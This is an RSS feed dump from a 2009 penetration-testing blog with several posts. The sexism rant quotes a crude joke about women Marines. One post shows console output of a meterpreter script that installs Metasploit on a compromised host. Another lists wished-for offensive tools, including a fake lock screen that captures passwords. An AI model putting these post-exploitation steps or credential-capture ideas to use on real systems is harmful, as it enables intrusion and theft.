<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/rss2full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:sy="http://purl.org/rss/1.0/modules/syndication/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" xmlns:creativeCommons="http://backend.userland.com/creativeCommonsRssModule" version="2.0">

<channel>
	<title>Room362.com</title>
	
	<link>http://www.room362.com</link>
	<description>Security Blog of a Mindless Drone</description>
	<lastBuildDate>Tue, 14 Jul 2009 13:59:26 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=abc</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<creativeCommons:license>http://creativecommons.org/licenses/by-sa/3.0/</creativeCommons:license><image><link>http://creativecommons.org/licenses/by-sa/3.0/</link><url>http://creativecommons.org/images/public/somerights20.gif</url><title>Some Rights Reserved</title></image><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" href="http://feeds.feedburner.com/Room362com" type="application/rss+xml" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com" /><item>
		<title>Sexism and the religion of hackers</title>
		<link>http://www.room362.com/archives/614-sexism-and-the-religion-of-hackers.html</link>
		<comments>http://www.room362.com/archives/614-sexism-and-the-religion-of-hackers.html#comments</comments>
		<pubDate>Mon, 13 Jul 2009 19:36:05 +0000</pubDate>
		<dc:creator>Rob Fuller</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Rant]]></category>
		<category><![CDATA[manifesto]]></category>
		<category><![CDATA[mentor]]></category>
		<category><![CDATA[religion]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[sexism]]></category>

		<guid isPermaLink="false">http://www.room362.com/?p=614</guid>
		<description><![CDATA[Let me preempt this post with the following facts: I am a white male veteran with amazing parents. I went to a good school, and was never under-valued by the people I cared about. I fit no minority profiles in other words. I tell you this so that you can latch on to it as [...]


No related posts.]]></description>
			<content:encoded><![CDATA[<p>Let me preempt this post with the following facts: I am a white male veteran with amazing parents. I went to a good school, and was never under-valued by the people I cared about. I fit no minority profiles in other words. I tell you this so that you can latch on to it as why I don’t understand anything in your rebuttal. But I think this gives me a unique view on the issue.</p>
<blockquote><p>“People are stupid. They will believe a lie because they want to believe it’s true, or because they are afraid it might be true.”</p>
</blockquote>
<p align="right">&#8212;-<span style="text-decoration: underline">Wizard’s First Rule</span> – By Terry Goodkind</p>
<p>This post was a long time coming. I feel pretty passionate about “my community”. I don’t say that in a lead-follower sense, but more of a Kum Ba Ya one. The feather that pushed this post over the edge into existence is @<a href="http://twitter.com/shazzzam">shazzzam</a>’s post “<a href="http://demosthenes.tumblr.com/post/140922392/female-stereotyping-in-security-research">Female stereotyping in security research</a>” which was in response to the <a href="http://hackerschool.org/DefconCTF/17/B300.html">Saphead’s Binary 300 solution cartoon</a>. But please keep in mind, this only set the cogs in motion for this post that I’ve been thinking about way before this cartoon came into existence.</p>
<p>Sexism, and for that matter, any “-ism” is flawed on both sides. Now, Shazzzam went no where near the extreme that most of the “-ists” do for their “-isms”, she actually had some great points&#160; however, that doesn’t excuse the presumptions she made. Pusscat, Hypatia, and Shazzzam (+ the many other women in IT) have made enormous contributions, just as males have. Hackers are hackers. The only thing we measure by is the brain in your noggin, but I’ll go into that later. Where Shazzzam went wrong is that she assumed that this cartoon was depicting the female falsely, which may or may have not been the case. She then used it as a soap box to express her hate for people who make presumptions about her mental abilities because of her sex.</p>
<p><strong><em>(Damn men, “they” are always assuming I’m an idiot)</em></strong></p>
<blockquote><p>“What’s the difference between a WM (woman-Marine) and a hooker? Hooker gets paid in the morning and the WM gets paid on the 1st and 15th.”</p>
</blockquote>
<p align="right">&#8212;-old Marine joke, origin unknown</p>
<p>While this is a crude joke, it illustrates a point. During my time in the Marine Corps I witnessed female Marines that were useless, ones that slept around, and those that outshined their peers, male and female alike. But guess what, those that did well were sadly the minority in my experiences. Now you might hinge your argument on that it’s my biased opinion that ‘saw’ what I wanted to see, and you very well could be right. I hardly consider myself perfect, but lets just say for the sake of argument that what I say is true. We all make assumptions, you are not perfect either, is it so wrong to bet on odds or experience when making assumptions? It’s human nature, but keeping an open mind is the key to this. How many Mark Dowds, HDs, Shazzzams and Pusscats are there in this world? How many times have you complained about an idiot boss or co-worker? How many times have you complained about script kiddies? or whatever you complain about on an assumption or amassed experience.</p>
<p><strong><em>(Stupid woman, “they” never do anything right, can’t even drive straight)</em></strong></p>
<p>This brings us to my favorite part, and why I love our community. Hackers are hackers:</p>
<blockquote><p>&lt;snip&gt; (<a href="http://www.phrack.org/issues.html?issue=7&amp;id=3&amp;mode=txt">original &#8211; phrak</a>)</p>
<p>We exist without skin color, without nationality, without religious <strong><em>(or sexual)</em></strong> bias&#8230; and you call us criminals. You build atomic bombs, you wage wars, you murder, cheat, and lie to us and try to make us believe it&#8217;s for our own good, yet we&#8217;re the criminals.</p>
<p>Yes, I am a criminal.&#160; My crime is that of curiosity.&#160; My crime is that of judging people by what they say and think, not what they look like. My crime is that of outsmarting you, something that you will never forgive me for.</p>
<p>I am a hacker, and this is my manifesto.&#160; You may stop this individual, but you can&#8217;t stop us all&#8230; after all, we&#8217;re all alike.</p>
<p>+++The Mentor+++</p>
</blockquote>
<p>I’ve taken the liberty of adding “(or sexual)” to this famous manifesto. But I think it stays in the spirit of it’s writer’s intent. This is my religion. I think all “ists” have forgotten what they fight for and just fight to be right. My suggestion? Make a mental note of those who have forgotten how to truly be what they claim as a title. For they will out themselves time and time again, and be destined to fail.</p>
<p><strong><em>(Damn kids.&#160; They&#8217;re all alike.)</em></strong></p>
<h4>EDIT: Nikita has done an excellent job of expressing what I so obviously failed at doing: <a href="http://attrition.org/news/content/09-07-14.001.html">http://attrition.org/news/content/09-07-14.001.html</a></h4>


<p>No related posts.</p><hr />
<p><small>© mubix for <a href="http://www.room362.com">Room362.com</a>, 2009. |
<a href="http://www.room362.com/archives/614-sexism-and-the-religion-of-hackers.html">Permalink</a> |
<a href="http://www.room362.com/archives/614-sexism-and-the-religion-of-hackers.html#comments">12 comments</a> |
Add to
<a href="http://del.icio.us/post?url=http://www.room362.com/archives/614-sexism-and-the-religion-of-hackers.html&title=Sexism and the religion of hackers">del.icio.us</a>
<br/>
Post tags: <a href="http://www.room362.com/archives/tag/hacking" rel="tag">Hacking</a>, <a href="http://www.room362.com/archives/tag/manifesto" rel="tag">manifesto</a>, <a href="http://www.room362.com/archives/tag/mentor" rel="tag">mentor</a>, <a href="http://www.room362.com/archives/tag/rant" rel="tag">Rant</a>, <a href="http://www.room362.com/archives/tag/religion" rel="tag">religion</a>, <a href="http://www.room362.com/archives/tag/security" rel="tag">security</a>, <a href="http://www.room362.com/archives/tag/sexism" rel="tag">sexism</a><br/>
</small></p>
<p><a href="http://feedads.g.doubleclick.net/~a/3czq7U_2PkmWPHuzd9BqMXzRWPw/0/da"><img src="http://feedads.g.doubleclick.net/~a/3czq7U_2PkmWPHuzd9BqMXzRWPw/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/3czq7U_2PkmWPHuzd9BqMXzRWPw/1/da"><img src="http://feedads.g.doubleclick.net/~a/3czq7U_2PkmWPHuzd9BqMXzRWPw/1/di" border="0" ismap="true"></img></a></p><div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/Room362com?a=RS6B-fzPCjE:Hg_G_k91SCg:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/Room362com?d=yIl2AUoC8zA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/Room362com?a=RS6B-fzPCjE:Hg_G_k91SCg:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/Room362com?i=RS6B-fzPCjE:Hg_G_k91SCg:V_sGLiPBpWU" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/Room362com?a=RS6B-fzPCjE:Hg_G_k91SCg:gIN9vFwOqvQ"><img src="http://feeds.feedburner.com/~ff/Room362com?i=RS6B-fzPCjE:Hg_G_k91SCg:gIN9vFwOqvQ" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/Room362com?a=RS6B-fzPCjE:Hg_G_k91SCg:7Q72WNTAKBA"><img src="http://feeds.feedburner.com/~ff/Room362com?d=7Q72WNTAKBA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/Room362com?a=RS6B-fzPCjE:Hg_G_k91SCg:F7zBnMyn0Lo"><img src="http://feeds.feedburner.com/~ff/Room362com?i=RS6B-fzPCjE:Hg_G_k91SCg:F7zBnMyn0Lo" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/Room362com?a=RS6B-fzPCjE:Hg_G_k91SCg:I56M4DFLkF8"><img src="http://feeds.feedburner.com/~ff/Room362com?i=RS6B-fzPCjE:Hg_G_k91SCg:I56M4DFLkF8" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/Room362com/~4/RS6B-fzPCjE" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.room362.com/archives/614-sexism-and-the-religion-of-hackers.html/feed</wfw:commentRss>
		<slash:comments>12</slash:comments>
		</item>
		<item>
		<title>Local Security – DC-NoVA-MD</title>
		<link>http://www.room362.com/archives/598-local-security-dc-nova-md.html</link>
		<comments>http://www.room362.com/archives/598-local-security-dc-nova-md.html#comments</comments>
		<pubDate>Mon, 29 Jun 2009 23:18:53 +0000</pubDate>
		<dc:creator>Rob Fuller</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://www.room362.com/?p=598</guid>
		<description><![CDATA[Looking for local events?
I&#8217;ve gotten a lot of people asking me recently where the local events are in DC, and I almost every time turn them to the awesome http://www.novainfosecportal.com/ which is hands down the best source for local events for the DC-NoVA-MD area, not just NoVA.
Grecs (follow him on twitter) does an amazing job at [...]


Related posts:<ol><li><a href='http://www.room362.com/archives/226-podcasters-meetup-at-shmoocon.html' rel='bookmark' title='Permanent Link: Podcasters Meetup at ShmooCon'>Podcasters Meetup at ShmooCon</a> <small>More information can be found at http://www.podcastersmeetup.com/ But here is...</small></li><li><a href='http://www.room362.com/archives/569-getting-your-fill-of-security.html' rel='bookmark' title='Permanent Link: Getting your fill of Security'>Getting your fill of Security</a> <small>I recently posted a blog post to Exotic Liability’s website...</small></li><li><a href='http://www.room362.com/archives/173-podcasters-meetup-defcon-16-update-2.html' rel='bookmark' title='Permanent Link: Podcaster&#8217;s Meetup @ DEFCON 16 Update 2'>Podcaster&#8217;s Meetup @ DEFCON 16 Update 2</a> <small>It’s almost that time. DefCon is right around the corner...</small></li></ol>]]></description>
			<content:encoded><![CDATA[<p>Looking for local events?</p>
<p>I&#8217;ve gotten a lot of people asking me recently where the local events are in DC, and I almost every time turn them to the awesome <a href="http://www.novainfosecportal.com/">http://www.novainfosecportal.com/</a> which is hands down the best source for local events for the DC-NoVA-MD area, not just NoVA.</p>
<p><a href="http://twitter.com/grecs">Grecs</a> (follow him on twitter) does an amazing job at keeping it up to date and filled with every event possible. (Subscribe to his google calendar of events, get the RSS feed.. all good stuff)</p>
<p>But there are other resources too:</p>
<p>DojoSec &#8211; <a href="http://www.dojosec.com/">http://www.dojosec.com/</a>- run by the amazing Marcus J. Carey who recently joined the P<a href="http://www.pauldotcom.com">aulDotCom Security Weekly</a> crew. DojoSec is a Monthly min-conference with 1 track and some of the best speakers in the local area, definitely worth</p>
<p>The Shmoo Group hosts the recently revived Security Geeks mailing list:  <a href="http://lists.shmoo.com/mailman/listinfo/secgeeks">http://lists.shmoo.com/mailman/listinfo/secgeeks</a></p>
<p>I run a luncheon that you can get on the list simply by emailing me (mubix hak5.org) or commenting here if you wish.</p>
<p>Another site to keep up on is <a href="http://infosecevents.net/">http://infosecevents.net/</a> run by <a href="http://twitter.com/ggee">GGEE</a> has a more broad scope of events, not just in the area.</p>
<p>Hope this helps more people find ways of getting connected with the community.</p>


<p>Related posts:<ol><li><a href='http://www.room362.com/archives/226-podcasters-meetup-at-shmoocon.html' rel='bookmark' title='Permanent Link: Podcasters Meetup at ShmooCon'>Podcasters Meetup at ShmooCon</a> <small>More information can be found at http://www.podcastersmeetup.com/ But here is...</small></li><li><a href='http://www.room362.com/archives/569-getting-your-fill-of-security.html' rel='bookmark' title='Permanent Link: Getting your fill of Security'>Getting your fill of Security</a> <small>I recently posted a blog post to Exotic Liability’s website...</small></li><li><a href='http://www.room362.com/archives/173-podcasters-meetup-defcon-16-update-2.html' rel='bookmark' title='Permanent Link: Podcaster&#8217;s Meetup @ DEFCON 16 Update 2'>Podcaster&#8217;s Meetup @ DEFCON 16 Update 2</a> <small>It’s almost that time. DefCon is right around the corner...</small></li></ol></p>
<p><a href="http://feedads.g.doubleclick.net/~a/X4HP-wGuHU-D4wP-kKBQe8dv714/0/da"><img src="http://feedads.g.doubleclick.net/~a/X4HP-wGuHU-D4wP-kKBQe8dv714/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/X4HP-wGuHU-D4wP-kKBQe8dv714/1/da"><img src="http://feedads.g.doubleclick.net/~a/X4HP-wGuHU-D4wP-kKBQe8dv714/1/di" border="0" ismap="true"></img></a></p><div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/Room362com?a=0e55Jgj12mQ:4b_1eQWydf4:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/Room362com?d=yIl2AUoC8zA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/Room362com?a=0e55Jgj12mQ:4b_1eQWydf4:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/Room362com?i=0e55Jgj12mQ:4b_1eQWydf4:V_sGLiPBpWU" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/Room362com?a=0e55Jgj12mQ:4b_1eQWydf4:gIN9vFwOqvQ"><img src="http://feeds.feedburner.com/~ff/Room362com?i=0e55Jgj12mQ:4b_1eQWydf4:gIN9vFwOqvQ" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/Room362com?a=0e55Jgj12mQ:4b_1eQWydf4:7Q72WNTAKBA"><img src="http://feeds.feedburner.com/~ff/Room362com?d=7Q72WNTAKBA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/Room362com?a=0e55Jgj12mQ:4b_1eQWydf4:F7zBnMyn0Lo"><img src="http://feeds.feedburner.com/~ff/Room362com?i=0e55Jgj12mQ:4b_1eQWydf4:F7zBnMyn0Lo" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/Room362com?a=0e55Jgj12mQ:4b_1eQWydf4:I56M4DFLkF8"><img src="http://feeds.feedburner.com/~ff/Room362com?i=0e55Jgj12mQ:4b_1eQWydf4:I56M4DFLkF8" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/Room362com/~4/0e55Jgj12mQ" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.room362.com/archives/598-local-security-dc-nova-md.html/feed</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Metasploit Framework as a Payload</title>
		<link>http://www.room362.com/archives/595-metasploit-framework-as-a-payload.html</link>
		<comments>http://www.room362.com/archives/595-metasploit-framework-as-a-payload.html#comments</comments>
		<pubDate>Fri, 26 Jun 2009 05:45:08 +0000</pubDate>
		<dc:creator>Rob Fuller</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[cygwin]]></category>
		<category><![CDATA[metasploit]]></category>
		<category><![CDATA[meterpreter]]></category>
		<category><![CDATA[payload]]></category>
		<category><![CDATA[pentesting]]></category>
		<category><![CDATA[script]]></category>
		<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://www.room362.com/?p=595</guid>
		<description><![CDATA[Well, sorta…
I created a meterpreter script that takes the cygwin bundled version of Metasploit inside of a NullSoft installer that HD Moore created and deploys it using meterpreter to the compromised host, extracts/installs it, and runs the shell. Now I left this intentionally open so that you could package your own cygwin bundle (possibly with [...]


Related posts:<ol><li><a href='http://www.room362.com/archives/274-metasploit.html' rel='bookmark' title='Permanent Link: Metasploit heart&#8217;s Microsoft'>Metasploit heart&#8217;s Microsoft</a> <small> Hiding Meterpreter with IExpress from mubix on Vimeo. Using...</small></li><li><a href='http://www.room362.com/archives/575-passivex-fun-with-metasploit.html' rel='bookmark' title='Permanent Link: PassiveX fun with Metasploit'>PassiveX fun with Metasploit</a> <small>I posted this walkthrough to the Metasploit mailing list, but...</small></li><li><a href='http://www.room362.com/archives/232-metasploit-across-the-net.html' rel='bookmark' title='Permanent Link: Metasploit Across the Net'>Metasploit Across the Net</a> <small>Metasploit is awesome, but some don’t know that their are...</small></li></ol>]]></description>
			<content:encoded><![CDATA[<p>Well, sorta…</p>
<p>I created a meterpreter script that takes the cygwin bundled version of Metasploit inside of a NullSoft installer that HD Moore created and deploys it using meterpreter to the compromised host, extracts/installs it, and runs the shell. Now I left this intentionally open so that you could package your own cygwin bundle (possibly with nmap and netcat), for your own evil fun.</p>
<p><em>Thanks defintely go to Carlos Perez (Dark0perator) and HD Moore for their help getting this bad boy working right.</em></p>
<p>You can download the script here: <a href="http://www.room362.com/tools/deploymsf.rb">http://www.room362.com/tools/deploymsf.rb</a></p>
<p>You can download the cygwin installs from the metasploit website:</p>
<p>13mb FULL framework: <a href="https://metasploit.com/framework-3.3-dev.exe">https://metasploit.com/framework-3.3-dev.exe</a><br />
5mb MINI (just msfconsole): <a href="https://metasploit.com/mini-3.3-dev.exe">https://metasploit.com/mini-3.3-dev.exe</a></p>
<p>And here is what it looks like:</p>
<blockquote><p>meterpreter &gt; run deploymsf -f framework-3.3-dev.exe<br />
[*] Running Meterpreter MSFp Deploytment Script&#8230;..<br />
[*] Uploading MSFp for for deployment&#8230;.<br />
[*] MSFp uploaded as C:\DOCUME~1\mubix\LOCALS~1\Temp\12681.exe<br />
[*] Installing MSFp&#8230;&#8230;&#8230;..<br />
[*] Done!<br />
[*] Installation Complete!<br />
[*] Running cygwin shell channelized&#8230;<br />
[*] Channel 18 created &#8211; Type: interact 18 to play<br />
[*] Be warned, it takes a bit for post setup to happen<br />
[*] and you will not see a prompt, try pwd to check<br />
meterpreter &gt; interact 18<br />
Interacting with channel 18&#8230;</p>
<p>[*] Configuring multi-user permissions for first run&#8230;<br />
[*] Configuring the initial user environment&#8230;<br />
pwd<br />
/home/mubix<br />
ls<br />
msfconsole<br />
*** Metasploit only has EXPERIMENTAL support for Ruby 1.9.1 and newer, things may break!<br />
*** Please report bugs to msfdev[at]metasploit.com<br />
[-] ***<br />
[-] * WARNING: No database support: LoadError no such file to load &#8212; active_record<br />
[-] ***</p>
<p>##                          ###           ##    ##<br />
##  ##  #### ###### ####  #####   #####    ##    ####        ######<br />
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##<br />
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##<br />
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##<br />
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###<br />
##</p>
<p>=[ msf v3.3-dev<br />
+ &#8212; &#8211;=[ 379 exploits &#8211; 231 payloads<br />
+ &#8212; &#8211;=[ 20 encoders &#8211; 7 nops<br />
=[ 156 aux</p>
<p>msf &gt;GAME OVER</p></blockquote>


<p>Related posts:<ol><li><a href='http://www.room362.com/archives/274-metasploit.html' rel='bookmark' title='Permanent Link: Metasploit heart&#8217;s Microsoft'>Metasploit heart&#8217;s Microsoft</a> <small> Hiding Meterpreter with IExpress from mubix on Vimeo. Using...</small></li><li><a href='http://www.room362.com/archives/575-passivex-fun-with-metasploit.html' rel='bookmark' title='Permanent Link: PassiveX fun with Metasploit'>PassiveX fun with Metasploit</a> <small>I posted this walkthrough to the Metasploit mailing list, but...</small></li><li><a href='http://www.room362.com/archives/232-metasploit-across-the-net.html' rel='bookmark' title='Permanent Link: Metasploit Across the Net'>Metasploit Across the Net</a> <small>Metasploit is awesome, but some don’t know that their are...</small></li></ol></p>
<p><a href="http://feedads.g.doubleclick.net/~a/uZawb1JWTRizvv4C8Q8lDDSyIcQ/0/da"><img src="http://feedads.g.doubleclick.net/~a/uZawb1JWTRizvv4C8Q8lDDSyIcQ/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/uZawb1JWTRizvv4C8Q8lDDSyIcQ/1/da"><img src="http://feedads.g.doubleclick.net/~a/uZawb1JWTRizvv4C8Q8lDDSyIcQ/1/di" border="0" ismap="true"></img></a></p><div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/Room362com?a=hWVoG1DzK8k:1k8w357cOwI:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/Room362com?d=yIl2AUoC8zA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/Room362com?a=hWVoG1DzK8k:1k8w357cOwI:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/Room362com?i=hWVoG1DzK8k:1k8w357cOwI:V_sGLiPBpWU" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/Room362com?a=hWVoG1DzK8k:1k8w357cOwI:gIN9vFwOqvQ"><img src="http://feeds.feedburner.com/~ff/Room362com?i=hWVoG1DzK8k:1k8w357cOwI:gIN9vFwOqvQ" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/Room362com?a=hWVoG1DzK8k:1k8w357cOwI:7Q72WNTAKBA"><img src="http://feeds.feedburner.com/~ff/Room362com?d=7Q72WNTAKBA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/Room362com?a=hWVoG1DzK8k:1k8w357cOwI:F7zBnMyn0Lo"><img src="http://feeds.feedburner.com/~ff/Room362com?i=hWVoG1DzK8k:1k8w357cOwI:F7zBnMyn0Lo" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/Room362com?a=hWVoG1DzK8k:1k8w357cOwI:I56M4DFLkF8"><img src="http://feeds.feedburner.com/~ff/Room362com?i=hWVoG1DzK8k:1k8w357cOwI:I56M4DFLkF8" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/Room362com/~4/hWVoG1DzK8k" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.room362.com/archives/595-metasploit-framework-as-a-payload.html/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Security Tools I’m Looking For Part I</title>
		<link>http://www.room362.com/archives/591-security-tools-im-looking-for-part-i.html</link>
		<comments>http://www.room362.com/archives/591-security-tools-im-looking-for-part-i.html#comments</comments>
		<pubDate>Wed, 17 Jun 2009 15:14:16 +0000</pubDate>
		<dc:creator>Rob Fuller</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://www.room362.com/?p=591</guid>
		<description><![CDATA[There are a lot of tools that I find in my endeavors would be really helpful, but can’t find on the net for whatever reason.

A portable version of of tshark that has ARP spoofing capabilities. I want to be able to drop the file, issue the arguments and pull the pcap back.
A application that can [...]


Related posts:<ol><li><a href='http://www.room362.com/archives/595-metasploit-framework-as-a-payload.html' rel='bookmark' title='Permanent Link: Metasploit Framework as a Payload'>Metasploit Framework as a Payload</a> <small>Well, sorta… I created a meterpreter script that takes the...</small></li><li><a href='http://www.room362.com/archives/178-defcon-16-the-tools-not-the-toools.html' rel='bookmark' title='Permanent Link: DEFCON 16: The Tools not the Toools'>DEFCON 16: The Tools not the Toools</a> <small>Originally posted to the Zero Day blog on Ziff Davis:...</small></li><li><a href='http://www.room362.com/archives/234-shmoocon-tools.html' rel='bookmark' title='Permanent Link: ShmooCon Tools'>ShmooCon Tools</a> <small>It figures that someone who didn’t go actually made a...</small></li></ol>]]></description>
			<content:encoded><![CDATA[<p>There are a lot of tools that I find in my endeavors would be really helpful, but can’t find on the net for whatever reason.</p>
<ol>
<li>A portable version of of tshark that has ARP spoofing capabilities. I want to be able to drop the file, issue the arguments and pull the pcap back.</li>
<li>A application that can sniff traffic from a specific process. Metasploit’s keylogger is sort of there as it only pulls keys from the process of which it is attached (DLL is to ‘fault’ for this). And Process Hacker is also pretty close, (Process Explorer does a TCPVIew like show of the connections currently happening).</li>
<li>An nmap script that sees port 445 open and tries pass the hash, and token passing to run a specified executable. I believe tebo was developing a psexec scanner for Metasploit, but it hasn’t been released as of yet.</li>
<li>A meterpreter script that sets the a all user GPO setting for wallpaper and forces the update. (For calling-card notifications during pen-tests)</li>
<li>A password list generator that would take URLs, and files (pulling metadata where applicable, strings in other cases). And churn out a dictionary, and also ask if you would like to start generating a Rainbow Table for that specific dictionary.</li>
<li>A meterpreter module like “Echo Mirage” by the BeEF guys, sort of like an iptables injection that modifies/accepts/denys packets to a specific process</li>
<li>This is Kevin Johnson’s idea but it should be posted: A standard XMLish format for all Web Application Scanners so that the tools interoperate. One spider session can be loaded into another tool and have it’s auditing system check it, instead of being confined too one tool.</li>
<li>A screen saver that imitates the screen saver lockout event and has the user login (and has it fail twice by default for “Password Validation <img src='http://www.room362.com/wp-includes/images/smilies/icon_wink.gif' alt=';-)' class='wp-smiley' /> ”)  and then allows them back in, capturing those password. (Usually a user will try a couple different passwords so you might be able to glean other credentials to use). It could also have an option to state. “Account Locked, You must be an Administrator to login” so that they call an admin in to unlock it <img src='http://www.room362.com/wp-includes/images/smilies/icon_wink.gif' alt=';-)' class='wp-smiley' /> </li>
</ol>
<p>I’ll leave it at that for now. Anyone interested in coding it ?</p>


<p>Related posts:<ol><li><a href='http://www.room362.com/archives/595-metasploit-framework-as-a-payload.html' rel='bookmark' title='Permanent Link: Metasploit Framework as a Payload'>Metasploit Framework as a Payload</a> <small>Well, sorta… I created a meterpreter script that takes the...</small></li><li><a href='http://www.room362.com/archives/178-defcon-16-the-tools-not-the-toools.html' rel='bookmark' title='Permanent Link: DEFCON 16: The Tools not the Toools'>DEFCON 16: The Tools not the Toools</a> <small>Originally posted to the Zero Day blog on Ziff Davis:...</small></li><li><a href='http://www.room362.com/archives/234-shmoocon-tools.html' rel='bookmark' title='Permanent Link: ShmooCon Tools'>ShmooCon Tools</a> <small>It figures that someone who didn’t go actually made a...</small></li></ol></p>
<p><a href="http://feedads.g.doubleclick.net/~a/xqgk8eNyFsep07mOqPf6aZV3OGE/0/da"><img src="http://feedads.g.doubleclick.net/~a/xqgk8eNyFsep07mOqPf6aZV3OGE/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/xqgk8eNyFsep07mOqPf6aZV3OGE/1/da"><img src="http://feedads.g.doubleclick.net/~a/xqgk8eNyFsep07mOqPf6aZV3OGE/1/di" border="0" ismap="true"></img></a></p><div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/Room362com?a=0G0zOZTJN2I:fAp2LhtDTA0:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/Room362com?d=yIl2AUoC8zA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/Room362com?a=0G0zOZTJN2I:fAp2LhtDTA0:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/Room362com?i=0G0zOZTJN2I:fAp2LhtDTA0:V_sGLiPBpWU" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/Room362com?a=0G0zOZTJN2I:fAp2LhtDTA0:gIN9vFwOqvQ"><img src="http://feeds.feedburner.com/~ff/Room362com?i=0G0zOZTJN2I:fAp2LhtDTA0:gIN9vFwOqvQ" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/Room362com?a=0G0zOZTJN2I:fAp2LhtDTA0:7Q72WNTAKBA"><img src="http://feeds.feedburner.com/~ff/Room362com?d=7Q72WNTAKBA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/Room362com?a=0G0zOZTJN2I:fAp2LhtDTA0:F7zBnMyn0Lo"><img src="http://feeds.feedburner.com/~ff/Room362com?i=0G0zOZTJN2I:fAp2LhtDTA0:F7zBnMyn0Lo" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/Room362com?a=0G0zOZTJN2I:fAp2LhtDTA0:I56M4DFLkF8"><img src="http://feeds.feedburner.com/~ff/Room362com?i=0G0zOZTJN2I:fAp2LhtDTA0:I56M4DFLkF8" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/Room362com/~4/0G0zOZTJN2I" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.room362.com/archives/591-security-tools-im-looking-for-part-i.html/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Getting your fill of Reverse Engineering and Malware Analysis</title>
		<link>http://www.room362.com/archives/585-getting-your-fill-of-reverse-engineering-and-malware-analysis.html</link>
		<comments>http://www.room362.com/archives/585-getting-your-fill-of-reverse-engineering-and-malware-analysis.html#comments</comments>
		<pubDate>Fri, 12 Jun 2009 18:46:02 +0000</pubDate>
		<dc:creator>Rob Fuller</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[blogs]]></category>
		<category><![CDATA[links]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[reverse-engineering]]></category>
		<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://www.room362.com/?p=585</guid>
		<description><![CDATA[Matt, from the Exotic Liability forums, posed a suggestion for a episode: &#8220;Getting started [in] reverse engineering hardware drivers?&#8220;. I thought this was an interesting topic to attack so, I dug a bit into my RSS feed pile of goo and compiled this list of links. Hope this helps Matt.
 
Individuals &#8212;
 
 Skywing &#8211; [...]


